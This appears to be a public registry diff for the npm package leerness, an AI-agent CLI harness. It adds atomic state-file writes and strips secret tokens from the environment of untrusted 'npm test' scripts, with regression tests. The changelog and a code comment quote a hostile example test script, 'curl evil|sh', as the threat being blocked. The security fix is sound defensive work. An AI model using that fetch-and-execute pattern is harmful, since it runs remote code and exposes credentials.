leerness 1.9.297 → 1.9.299
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/CHANGELOG.md +37 -0
- package/README.md +5 -5
- package/bin/harness.js +35 -6
- package/package.json +1 -1
- package/scripts/e2e.js +54 -0
package/CHANGELOG.md
CHANGED
|
@@ -1,5 +1,42 @@
|
|
|
1
1
|
# Changelog
|
|
2
2
|
|
|
3
|
+
## 1.9.299 — 2026-06-04 — UR-0039: npm test 시크릿 노출 차단 (외부 AI 리뷰 #2, Opus S-1)
|
|
4
|
+
|
|
5
|
+
**🔒 신뢰 못 할 워크스페이스의 `npm test` 가 호스트 `process.env`(시크릿 전체)를 상속받던 실질 취약점 차단. Opus 4.8 리뷰가 코드 라인 근거로 지적한 high 보안 이슈.**
|
|
6
|
+
|
|
7
|
+
### 배경 (Opus S-1)
|
|
8
|
+
`verify-claim --run-tests`(9475)와 `reuse --run-tests`(10051)가 `cp.spawnSync('npm test', [], { shell:true })` 를 **env 미지정**으로 호출 → 임의 `package.json` `"test"` 스크립트가 호스트의 모든 환경변수(AWS/OPENAI/ANTHROPIC 키, GITHUB_TOKEN, NPM_TOKEN, LEERNESS_NPM_TOKEN 등)에 접근. 악성 워크스페이스의 `"test":"curl evil|sh"` 가 시크릿 전체를 탈취 가능. `runCommandSafe`(cwd jail + `_scrubEnv`)가 있는데도 우회됨. verify-code(14684)는 runCommandSafe 경유였으나 `_scrubEnv` 가 release 토큰을 통과시켜 test 스크립트에 노출.
|
|
9
|
+
|
|
10
|
+
### 구현 (UR-0039)
|
|
11
|
+
1. **`_scrubTestEnv()` 신설** — `_scrubEnv` 결과에서 시크릿 키까지 제거(`_isSecretKey` 단일출처 재사용). `_scrubEnv` 는 release/publish 호환으로 GITHUB_TOKEN/NPM_TOKEN/GH_TOKEN/LEERNESS_*(LEERNESS_NPM_TOKEN 포함) 통과시키나, 임의 test 스크립트엔 전부 제거. PATH 등 실행 필수 키는 유지.
|
|
12
|
+
2. **`runCommandSafe` `scrubSecrets` 옵션** — true 시 `_scrubTestEnv` 사용(기본은 `_scrubEnv`, release/git 흐름 유지).
|
|
13
|
+
3. **취약 spawn 전환** — verify-claim --run-tests(9475)/reuse --run-tests(10051)를 `cp.spawnSync` → `runCommandSafe(..., { scrubSecrets:true })`. cwd jail + 시크릿 차단 동시 획득. verify-code(14684)에도 `scrubSecrets:true` 추가.
|
|
14
|
+
4. selftest 46→47 (`_scrubEnv` 토큰 유지 vs `_scrubTestEnv` 제거 + PATH 유지) · e2e 243→244 (대조군: 스크럽 없이 직접 실행 시 토큰 노출 exit 1 → verify-code 는 스크럽으로 test 통과).
|
|
15
|
+
|
|
16
|
+
### 검증
|
|
17
|
+
- **selftest 47/47 PASS** · **E2E 244/244 PASS** (회귀 0).
|
|
18
|
+
- 실측: 토큰이 보이면 exit 1 인 test 스크립트가 verify-code(scrubSecrets) 에선 **통과**(스크럽됨), 직접 npm test(대조군)에선 **exit 1**(노출 확인 — 테스트 자체 유효성 검증).
|
|
19
|
+
- `_scrubEnv` 는 NPM_TOKEN 유지(release publish 정상), `_scrubTestEnv` 는 NPM_TOKEN/LEERNESS_NPM_TOKEN 제거 + PATH 유지.
|
|
20
|
+
|
|
21
|
+
## 1.9.298 — 2026-06-04 — UR-0038: writeUtf8 원자적 쓰기 (외부 AI 리뷰 3중수렴 #1)
|
|
22
|
+
|
|
23
|
+
**🔒 외부 AI 리뷰 3종(Codex gpt-5.5 · Sonnet 4.8 · Opus 4.8)이 공통 high로 지적한 최우선 신뢰성 이슈 해소 — 모든 상태 파일 쓰기를 원자적(temp→rename)으로 전환해 부분쓰기 손상을 근본 차단. "메모리 항상 보존" 약속을 코드로 보증.**
|
|
24
|
+
|
|
25
|
+
### 배경
|
|
26
|
+
세 리뷰가 독립적으로 동일 지적: `writeUtf8()`(중앙 쓰기 헬퍼, 109곳 사용)가 `fs.writeFileSync` 직접 호출이라 crash/타임아웃 kill/동시쓰기 중 **부분 기록으로 상태 파일이 손상**될 수 있음. 실제로 1.9.293에서 progress-tracker.md 69줄 손상 전례. README/FAQ가 "사용자 메모리 항상 보존"을 핵심 약속으로 내세우나 코드 보증이 없었음.
|
|
27
|
+
|
|
28
|
+
### 구현 (UR-0038 — 원자적 쓰기 부분)
|
|
29
|
+
1. **`writeUtf8()` 원자화** — temp 파일(`<path>.tmp-<pid>-<seq>`)에 기록 후 `fs.renameSync(tmp, path)` 원자 교체. rename 은 동일 디렉토리(=동일 FS)라 POSIX/NTFS 모두 원자적(Node renameSync = MOVEFILE_REPLACE_EXISTING). 109개 모든 호출처(progress-tracker/decisions/rules/plan/session-handoff/.leerness 상태)가 자동 보호.
|
|
30
|
+
2. **실패 안전** — 쓰기 실패 시 temp 정리(unlink) 후 throw. temp 이름이 확장자 끝이 아니라(`.tmp-PID-SEQ`) `*.md` glob 에 안 걸림(파서 오염 방지).
|
|
31
|
+
3. selftest 45→46 (원자 패턴 소스 검증) · e2e 242→243 (반복쓰기 후 무손상 + 헤더 1개 + temp 잔여 0 실측).
|
|
32
|
+
|
|
33
|
+
### 검증
|
|
34
|
+
- **selftest 46/46 PASS** · **E2E 243/243 PASS** (회귀 0).
|
|
35
|
+
- 실측: init + task add×3 + decision add×3 반복 후 progress-tracker 정확(중복/손상 0) · `.harness` 전체에 `.tmp-` 잔여 0 · 헤더 1줄 유지.
|
|
36
|
+
|
|
37
|
+
### 남은 부분 (UR-0038 후속)
|
|
38
|
+
- 동시 writer **lost-update**(read-modify-write 경합) 방지를 위한 상태 파일 락 — 별도 후속 라운드(원자 쓰기로 손상 클래스는 이미 제거됨, 락은 rare 한 동시쓰기 유실 대비).
|
|
39
|
+
|
|
3
40
|
## 1.9.297 — 2026-06-04 — UR-0025 (5단계): MCP 도구 정의 → lib/mcp-tools.js 단일출처 (Codex #5 영구 해소)
|
|
4
41
|
|
|
5
42
|
**🧩 모놀리스 분리 5단계 — 첫 "기능 영역" 분리. MCP 도구 정의 81종을 단일출처 모듈로 분리하며 `_mcpToolCount` 의 `__filename` regex self-count(Codex #5 취약성)를 영구 해소.**
|
package/README.md
CHANGED
|
@@ -3,7 +3,7 @@
|
|
|
3
3
|
> **AI 코딩 에이전트의 거짓 완료·중복·망각·충돌을 막아주는 검수·기억·협업 CLI 하네스.**
|
|
4
4
|
> **A CLI harness that stops AI coding agents from faking completion, duplicating work, forgetting context, and colliding.**
|
|
5
5
|
|
|
6
|
-
[](https://www.npmjs.com/package/leerness) [](https://www.npmjs.com/package/leerness) []() []() []() []() []() []()
|
|
7
7
|
|
|
8
8
|
```
|
|
9
9
|
╔══════════════════════════════════════════════════════════════╗
|
|
@@ -471,7 +471,7 @@ MIT — © leerness contributors
|
|
|
471
471
|
<!-- leerness:project-readme:start -->
|
|
472
472
|
## Leerness Project Harness
|
|
473
473
|
|
|
474
|
-
이 프로젝트는 Leerness v1.9.
|
|
474
|
+
이 프로젝트는 Leerness v1.9.299 하네스를 사용합니다. AI 에이전트는 작업 전 `leerness handoff`로 컨텍스트를 적재하고, 작업 후 `leerness check`/`leerness audit`/`leerness session close`를 수행해야 합니다.
|
|
475
475
|
|
|
476
476
|
### 정체성 — AI 에이전트 운영 레이어 (UR-0030)
|
|
477
477
|
|
|
@@ -525,7 +525,7 @@ leerness memory restore decision <date|title>
|
|
|
525
525
|
|
|
526
526
|
### MCP server (외부 AI 통합)
|
|
527
527
|
|
|
528
|
-
Leerness v1.9.
|
|
528
|
+
Leerness v1.9.299는 stdio JSON-RPC MCP server를 내장합니다 — Claude Code · Cursor · Codex CLI 등 외부 AI에 **81개 도구**를 노출:
|
|
529
529
|
|
|
530
530
|
```jsonc
|
|
531
531
|
// 카테고리별
|
|
@@ -546,7 +546,7 @@ Leerness v1.9.297는 stdio JSON-RPC MCP server를 내장합니다 — Claude Cod
|
|
|
546
546
|
`<<autonomous-loop-dynamic>>` 신호만 보내면 AI가:
|
|
547
547
|
1) 다음 라운드 후보 선정 → 2) 코드 변경 → 3) stress-v* 신규 작성 + 누적 회귀 → 4) e2e 219/219 → 5) npm pack + git tag + GitHub release → 6) main 자동 push (1.9.140+) → 7) session close → 8) 다음 라운드 예약.
|
|
548
548
|
|
|
549
|
-
현재 누적: **70 라운드 (1.9.40 → 1.9.
|
|
549
|
+
현재 누적: **70 라운드 (1.9.40 → 1.9.299)** · 매 라운드 GitHub release/태그 생성 · _reports/는 비공개 보존.
|
|
550
550
|
|
|
551
551
|
### 성능 가이드 (1.9.140 측정)
|
|
552
552
|
|
|
@@ -584,6 +584,6 @@ leerness release pack --close --auto-main-push
|
|
|
584
584
|
- `.harness/session-handoff.md`: 다음 세션 인수인계 (자동 작성)
|
|
585
585
|
- `.harness/lessons.md` / `decisions.md` / `rules.md`: 영구 메모리 (5 surface)
|
|
586
586
|
|
|
587
|
-
Last synced by Leerness v1.9.
|
|
587
|
+
Last synced by Leerness v1.9.299: 2026-06-04
|
|
588
588
|
<!-- leerness:project-readme:end -->
|
|
589
589
|
|
package/bin/harness.js
CHANGED
|
@@ -12,7 +12,7 @@ const { _isSecretKey, compareVer, parseHarnessVersion, _classifyCJK, _riskLabel,
|
|
|
12
12
|
// 1.9.295 (UR-0025 4단계): 정적 데이터 카탈로그 모듈 분리 (비파괴, require-based).
|
|
13
13
|
const { CAPABILITY_SURFACE, POWERFUL_COMMANDS, ADAPTERS, REUSE_CATEGORIES, REUSE_CHECKLIST } = require('../lib/catalogs');
|
|
14
14
|
|
|
15
|
-
const VERSION = '1.9.
|
|
15
|
+
const VERSION = '1.9.299';
|
|
16
16
|
|
|
17
17
|
// 1.9.290 (UR-0037, Codex gpt-5.5 #4 수렴): CLI 전용 부작용은 require 시 실행하지 않는다.
|
|
18
18
|
// 이전: warning listener 제거 / NODE_OPTIONS 변경 / chcp IIFE 가 top-level 즉시 실행 → require('harness') 시 호스트 프로세스 오염.
|
|
@@ -172,7 +172,22 @@ function read(p) {
|
|
|
172
172
|
}
|
|
173
173
|
function readBuf(p) { return fs.readFileSync(p); }
|
|
174
174
|
function mkdirp(p) { fs.mkdirSync(p, { recursive: true }); }
|
|
175
|
-
|
|
175
|
+
// 1.9.298 (UR-0038, 외부리뷰 3중수렴): 원자적 쓰기 — temp 파일에 기록 후 rename(원자 교체)으로 부분쓰기 손상 방지.
|
|
176
|
+
// crash/타임아웃 kill/동시쓰기 중에도 대상 파일에 깨진 부분파일이 남지 않음 ('메모리 항상 보존' 코드 보증).
|
|
177
|
+
// rename 은 동일 디렉토리(=동일 FS) 라 POSIX/NTFS 모두 원자적(Node renameSync = MOVEFILE_REPLACE_EXISTING).
|
|
178
|
+
// temp 이름은 확장자 끝이 아니라 .tmp-PID-SEQ 라 *.md glob 에 안 걸림. 실패 시 temp 정리.
|
|
179
|
+
let _writeSeq = 0;
|
|
180
|
+
function writeUtf8(p, s) {
|
|
181
|
+
mkdirp(path.dirname(p));
|
|
182
|
+
const tmp = `${p}.tmp-${process.pid}-${++_writeSeq}`;
|
|
183
|
+
try {
|
|
184
|
+
fs.writeFileSync(tmp, s, { encoding: 'utf8' });
|
|
185
|
+
fs.renameSync(tmp, p);
|
|
186
|
+
} catch (e) {
|
|
187
|
+
try { if (fs.existsSync(tmp)) fs.unlinkSync(tmp); } catch {}
|
|
188
|
+
throw e;
|
|
189
|
+
}
|
|
190
|
+
}
|
|
176
191
|
function append(p, s) { mkdirp(path.dirname(p)); fs.appendFileSync(p, s, 'utf8'); }
|
|
177
192
|
function rel(root, p) { return path.relative(root, p).replace(/\\/g, '/') || '.'; }
|
|
178
193
|
function today() { return new Date().toISOString().slice(0, 10); }
|
|
@@ -3018,6 +3033,8 @@ function _selfTestCases() {
|
|
|
3018
3033
|
{ name: 'lib/catalogs: CAPABILITY/ADAPTERS/REUSE 모듈 단일출처 분리 (UR-0025 1.9.295)', run: () => { const m = require('../lib/catalogs'); return m.CAPABILITY_SURFACE === CAPABILITY_SURFACE && m.ADAPTERS === ADAPTERS && m.REUSE_CATEGORIES === REUSE_CATEGORIES && m.REUSE_CHECKLIST === REUSE_CHECKLIST && m.POWERFUL_COMMANDS === POWERFUL_COMMANDS && Object.keys(m.CAPABILITY_SURFACE).length === 6 && !/const CAPABILITY_SURFACE = \{/.test(read(__filename)); } },
|
|
3019
3034
|
{ name: 'about: 정체성 verb(AI 운영 레이어) + MCP leerness_about 등록 (UR-0030 1.9.296)', run: () => { const id = _leernessIdentity(); const src = read(__filename); return typeof aboutCmd === 'function' && /운영 레이어/.test(id.identity) && id.layers.length === 5 && id.surface.mcpTools >= 81 && require('../lib/mcp-tools').some(t => t.name === 'leerness_about') && /case 'leerness_about':/.test(src) && /cmd === 'about' \|\| cmd === 'identity'/.test(src); } },
|
|
3020
3035
|
{ name: 'lib/mcp-tools: MCP 도구 정의 모듈 단일출처 (_mcpToolCount=모듈 length, Codex #5 영구해소) (UR-0025 1.9.297)', run: () => { const T = require('../lib/mcp-tools'); return Array.isArray(T) && T.length >= 81 && T.every(t => t.name && t.description && t.inputSchema) && T[0].name === 'leerness_handoff' && _mcpToolCount() === T.length && !/const TOOLS = \[/.test(read(__filename)); } },
|
|
3036
|
+
{ name: 'writeUtf8: 원자적 쓰기(temp→rename) 손상방지 (UR-0038 외부리뷰 3중수렴 1.9.298)', run: () => { const src = read(__filename); return /function writeUtf8\(p, s\)/.test(src) && /fs\.writeFileSync\(tmp,/.test(src) && /fs\.renameSync\(tmp, p\)/.test(src) && /\.tmp-\$\{process\.pid\}/.test(src) && /fs\.unlinkSync\(tmp\)/.test(src); } },
|
|
3037
|
+
{ name: '_scrubTestEnv: npm test 시크릿 차단(_scrubEnv는 release 토큰 유지) (UR-0039 외부리뷰 1.9.299)', run: () => { const o = { N: process.env.NPM_TOKEN, L: process.env.LEERNESS_NPM_TOKEN }; process.env.NPM_TOKEN = 'sec1'; process.env.LEERNESS_NPM_TOKEN = 'sec2'; const base = _scrubEnv(); const test = _scrubTestEnv(); const r = base.NPM_TOKEN === 'sec1' && base.LEERNESS_NPM_TOKEN === 'sec2' && !test.NPM_TOKEN && !test.LEERNESS_NPM_TOKEN && !!test.PATH; if (o.N === undefined) delete process.env.NPM_TOKEN; else process.env.NPM_TOKEN = o.N; if (o.L === undefined) delete process.env.LEERNESS_NPM_TOKEN; else process.env.LEERNESS_NPM_TOKEN = o.L; return r; } },
|
|
3021
3038
|
{ name: 'VERSION 형식 (x.y.z)', run: () => /^\d+\.\d+\.\d+$/.test(VERSION) }
|
|
3022
3039
|
];
|
|
3023
3040
|
}
|
|
@@ -9456,7 +9473,8 @@ function verifyClaimCmd(root, taskId) {
|
|
|
9456
9473
|
if (!hasTestScript) {
|
|
9457
9474
|
runResult = { skipped: true, reason: 'scripts.test 없음' };
|
|
9458
9475
|
} else {
|
|
9459
|
-
|
|
9476
|
+
// 1.9.299 (UR-0039): 신뢰 못 할 워크스페이스 npm test → runCommandSafe + scrubSecrets (시크릿 노출 차단 + cwd jail).
|
|
9477
|
+
const r = runCommandSafe('npm test', [], { cwd: root, root, encoding: 'utf8', allowShell: true, scrubSecrets: true, timeout: 5 * 60 * 1000, kind: 'verify_claim_test' });
|
|
9460
9478
|
const out = (r.stdout || '') + (r.stderr || '');
|
|
9461
9479
|
// 1.9.20: 파싱 패턴 확장 — 한국어 + jest/mocha/tap/vitest
|
|
9462
9480
|
let parsed = null;
|
|
@@ -10031,7 +10049,8 @@ function depsImpactCmd(root, targetCapability) {
|
|
|
10031
10049
|
try { pkg = JSON.parse(read(pkgPath)); } catch {}
|
|
10032
10050
|
if (!pkg?.scripts?.test) { log(` ⚠ ${projName}: scripts.test 없음 — skip`); continue; }
|
|
10033
10051
|
const t0 = Date.now();
|
|
10034
|
-
|
|
10052
|
+
// 1.9.299 (UR-0039): 영향 프로젝트 npm test → runCommandSafe + scrubSecrets (시크릿 노출 차단). root=projPath 라 cwd jail 통과.
|
|
10053
|
+
const r = runCommandSafe('npm test', [], { cwd: projPath, root: projPath, encoding: 'utf8', allowShell: true, scrubSecrets: true, timeout: 5 * 60 * 1000, kind: 'reuse_impact_test' });
|
|
10035
10054
|
const elapsed = Date.now() - t0;
|
|
10036
10055
|
const out = (r.stdout || '') + (r.stderr || '');
|
|
10037
10056
|
const m = out.match(/(\d+)\s*\/\s*(\d+)\s*(?:passed|통과|pass|passing)/i);
|
|
@@ -14665,7 +14684,8 @@ function verifyCodeCmd(root) {
|
|
|
14665
14684
|
log(`\n## ${t.name}: ${t.cmd}`);
|
|
14666
14685
|
const start = Date.now();
|
|
14667
14686
|
// 1.9.150: runCommandSafe — cwd jail + env scrub + observability 자동 (shell:true 유지 — npm/pytest 호환)
|
|
14668
|
-
|
|
14687
|
+
// 1.9.299 (UR-0039): scrubSecrets — 신뢰 못 할 워크스페이스 test/build 스크립트에 publish 토큰/시크릿 노출 차단.
|
|
14688
|
+
const r = runCommandSafe(t.cmd, [], { cwd: root, root, timeout: 5 * 60 * 1000, allowShell: true, scrubSecrets: true, kind: 'verify_code_task', label: `verify-${t.name}` });
|
|
14669
14689
|
const dur = Date.now() - start;
|
|
14670
14690
|
if (r.status === 0) ok(`${t.name} passed (${dur}ms)`);
|
|
14671
14691
|
else if (t.optional && r.status === 127) warn(`${t.name} 스킵 (${t.cmd} 없음)`);
|
|
@@ -17637,6 +17657,14 @@ function _scrubEnv(extraEnv) {
|
|
|
17637
17657
|
}
|
|
17638
17658
|
return out;
|
|
17639
17659
|
}
|
|
17660
|
+
// 1.9.299 (UR-0039, 외부리뷰 3중수렴): 신뢰 못 할 워크스페이스 스크립트(npm test 등) 실행용 — _scrubEnv 결과에서 시크릿 키까지 제거.
|
|
17661
|
+
// _scrubEnv 는 release/publish 호환을 위해 GITHUB_TOKEN/NPM_TOKEN/GH_TOKEN/LEERNESS_*(LEERNESS_NPM_TOKEN 포함)를 통과시키나,
|
|
17662
|
+
// 임의 package.json "test" 스크립트(예: "test":"curl evil|sh")엔 토큰 노출 금지. _isSecretKey(단일 출처)로 시크릿 키 일괄 제거.
|
|
17663
|
+
function _scrubTestEnv(extraEnv) {
|
|
17664
|
+
const out = _scrubEnv(extraEnv);
|
|
17665
|
+
for (const k of Object.keys(out)) { if (_isSecretKey(k)) delete out[k]; }
|
|
17666
|
+
return out;
|
|
17667
|
+
}
|
|
17640
17668
|
function _isCwdSafe(root, cwd) {
|
|
17641
17669
|
try {
|
|
17642
17670
|
if (!cwd) return true;
|
|
@@ -17686,7 +17714,8 @@ function runCommandSafe(cmd, args, opts) {
|
|
|
17686
17714
|
encoding: opts.encoding || 'utf8',
|
|
17687
17715
|
timeout,
|
|
17688
17716
|
shell: useShell,
|
|
17689
|
-
|
|
17717
|
+
// 1.9.299 (UR-0039): scrubSecrets=true 시 시크릿 키까지 제거(신뢰 못 할 npm test 실행). 기본은 _scrubEnv(release/publish 토큰 유지).
|
|
17718
|
+
env: opts.scrubSecrets ? _scrubTestEnv(opts.env) : _scrubEnv(opts.env),
|
|
17690
17719
|
input: opts.input,
|
|
17691
17720
|
stdio: opts.stdio || 'pipe'
|
|
17692
17721
|
};
|
package/package.json
CHANGED
package/scripts/e2e.js
CHANGED
|
@@ -3269,5 +3269,59 @@ total++;
|
|
|
3269
3269
|
if (!ok) failed++;
|
|
3270
3270
|
}
|
|
3271
3271
|
|
|
3272
|
+
// 1.9.298 회귀 (UR-0038 외부리뷰): writeUtf8 원자적 쓰기 — 반복 쓰기 후 무손상 + temp 잔여 0
|
|
3273
|
+
total++;
|
|
3274
|
+
{
|
|
3275
|
+
let ok = false;
|
|
3276
|
+
try {
|
|
3277
|
+
const aDir = fs.mkdtempSync(path.join(os.tmpdir(), 'leerness-atomic-'));
|
|
3278
|
+
cp.spawnSync(process.execPath, [CLI, 'init', aDir, '--yes', '--language', 'ko', '--skills', 'recommended'], { encoding: 'utf8', timeout: 30000 });
|
|
3279
|
+
// writeUtf8 경유 명령 반복 (progress-tracker/decisions 갱신)
|
|
3280
|
+
for (let i = 0; i < 3; i++) {
|
|
3281
|
+
cp.spawnSync(process.execPath, [CLI, 'task', 'add', `원자성 테스트 T-${i}`, '--path', aDir], { encoding: 'utf8', timeout: 15000 });
|
|
3282
|
+
cp.spawnSync(process.execPath, [CLI, 'decision', 'add', `결정 ${i}`, '--reason', 'r', '--path', aDir], { encoding: 'utf8', timeout: 15000 });
|
|
3283
|
+
}
|
|
3284
|
+
const pt = fs.readFileSync(path.join(aDir, '.harness', 'progress-tracker.md'), 'utf8');
|
|
3285
|
+
// (1) 3개 task 모두 기록 + 구분자 라인 1개(중복/손상 없음). 라인 기준 카운트(|---|---| 한 줄에 부분매치 다수 방지).
|
|
3286
|
+
const sepLines = pt.split('\n').filter(l => /^\|---\|/.test(l)).length;
|
|
3287
|
+
const tasksOk = /원자성 테스트 T-0/.test(pt) && /원자성 테스트 T-2/.test(pt) && sepLines === 1;
|
|
3288
|
+
// (2) .harness 어디에도 .tmp- 잔여 파일 없음 (rename 완료)
|
|
3289
|
+
const walk = (d) => fs.readdirSync(d, { withFileTypes: true }).flatMap(e => e.isDirectory() ? walk(path.join(d, e.name)) : [path.join(d, e.name)]);
|
|
3290
|
+
const tmpLeftover = walk(path.join(aDir, '.harness')).filter(f => /\.tmp-\d+-\d+$/.test(f));
|
|
3291
|
+
// (3) 소스에 renameSync 원자 패턴 존재
|
|
3292
|
+
const srcOk = /fs\.renameSync\(tmp, p\)/.test(fs.readFileSync(path.resolve(__dirname, '..', 'bin', 'harness.js'), 'utf8'));
|
|
3293
|
+
ok = tasksOk && tmpLeftover.length === 0 && srcOk;
|
|
3294
|
+
fs.rmSync(aDir, { recursive: true, force: true });
|
|
3295
|
+
} catch {}
|
|
3296
|
+
console.log(ok ? '✓ B(1.9.298) writeUtf8 원자적 쓰기: 반복쓰기 무손상 + temp 잔여 0 (UR-0038 외부리뷰)' : '✗ writeUtf8 원자성 실패');
|
|
3297
|
+
if (!ok) failed++;
|
|
3298
|
+
}
|
|
3299
|
+
|
|
3300
|
+
// 1.9.299 회귀 (UR-0039 외부리뷰): npm test 시크릿 차단 — 토큰이 보이면 exit 1 인 test 스크립트가 verify-code 에서 통과해야(스크럽됨)
|
|
3301
|
+
total++;
|
|
3302
|
+
{
|
|
3303
|
+
let ok = false;
|
|
3304
|
+
try {
|
|
3305
|
+
const secDir = fs.mkdtempSync(path.join(os.tmpdir(), 'leerness-sec-'));
|
|
3306
|
+
// test: NPM_TOKEN/LEERNESS_NPM_TOKEN 가 보이면 exit 1(스크럽 실패), 안 보이면 exit 0
|
|
3307
|
+
fs.writeFileSync(path.join(secDir, 'package.json'), JSON.stringify({
|
|
3308
|
+
name: 'sec', version: '0.0.1',
|
|
3309
|
+
scripts: { test: 'node -e "process.exit(process.env.NPM_TOKEN||process.env.LEERNESS_NPM_TOKEN?1:0)"' }
|
|
3310
|
+
}) + '\n', 'utf8');
|
|
3311
|
+
// 시크릿을 env 에 심고 verify-code 실행 → 스크럽되면 스크립트가 토큰을 못 봐 exit 0(test passed)
|
|
3312
|
+
const r = cp.spawnSync(process.execPath, [CLI, 'verify-code', secDir], {
|
|
3313
|
+
cwd: secDir, encoding: 'utf8', timeout: 60000,
|
|
3314
|
+
env: { ...process.env, NPM_TOKEN: 'leaktok', LEERNESS_NPM_TOKEN: 'leaklz' }
|
|
3315
|
+
});
|
|
3316
|
+
const out = (r.stdout || '') + (r.stderr || '');
|
|
3317
|
+
// 대조군: 같은 스크립트를 스크럽 없이 직접 실행하면 exit 1 (토큰 노출 확인 — 테스트 자체 유효성)
|
|
3318
|
+
const ctrl = cp.spawnSync('npm test', [], { cwd: secDir, shell: true, encoding: 'utf8', timeout: 30000, env: { ...process.env, NPM_TOKEN: 'leaktok' } });
|
|
3319
|
+
ok = /✓ test passed/.test(out) && !/✗ test/.test(out) && ctrl.status === 1;
|
|
3320
|
+
fs.rmSync(secDir, { recursive: true, force: true });
|
|
3321
|
+
} catch {}
|
|
3322
|
+
console.log(ok ? '✓ B(1.9.299) npm test 시크릿 차단: verify-code 가 NPM_TOKEN/LEERNESS_NPM_TOKEN 스크럽 (UR-0039 외부리뷰)' : '✗ npm test 시크릿 차단 실패');
|
|
3323
|
+
if (!ok) failed++;
|
|
3324
|
+
}
|
|
3325
|
+
|
|
3272
3326
|
console.log(`\nE2E result: ${total - failed}/${total} passed · ${((Date.now() - _e2eStart) / 1000).toFixed(0)}s`);
|
|
3273
3327
|
if (failed > 0) process.exit(1);
|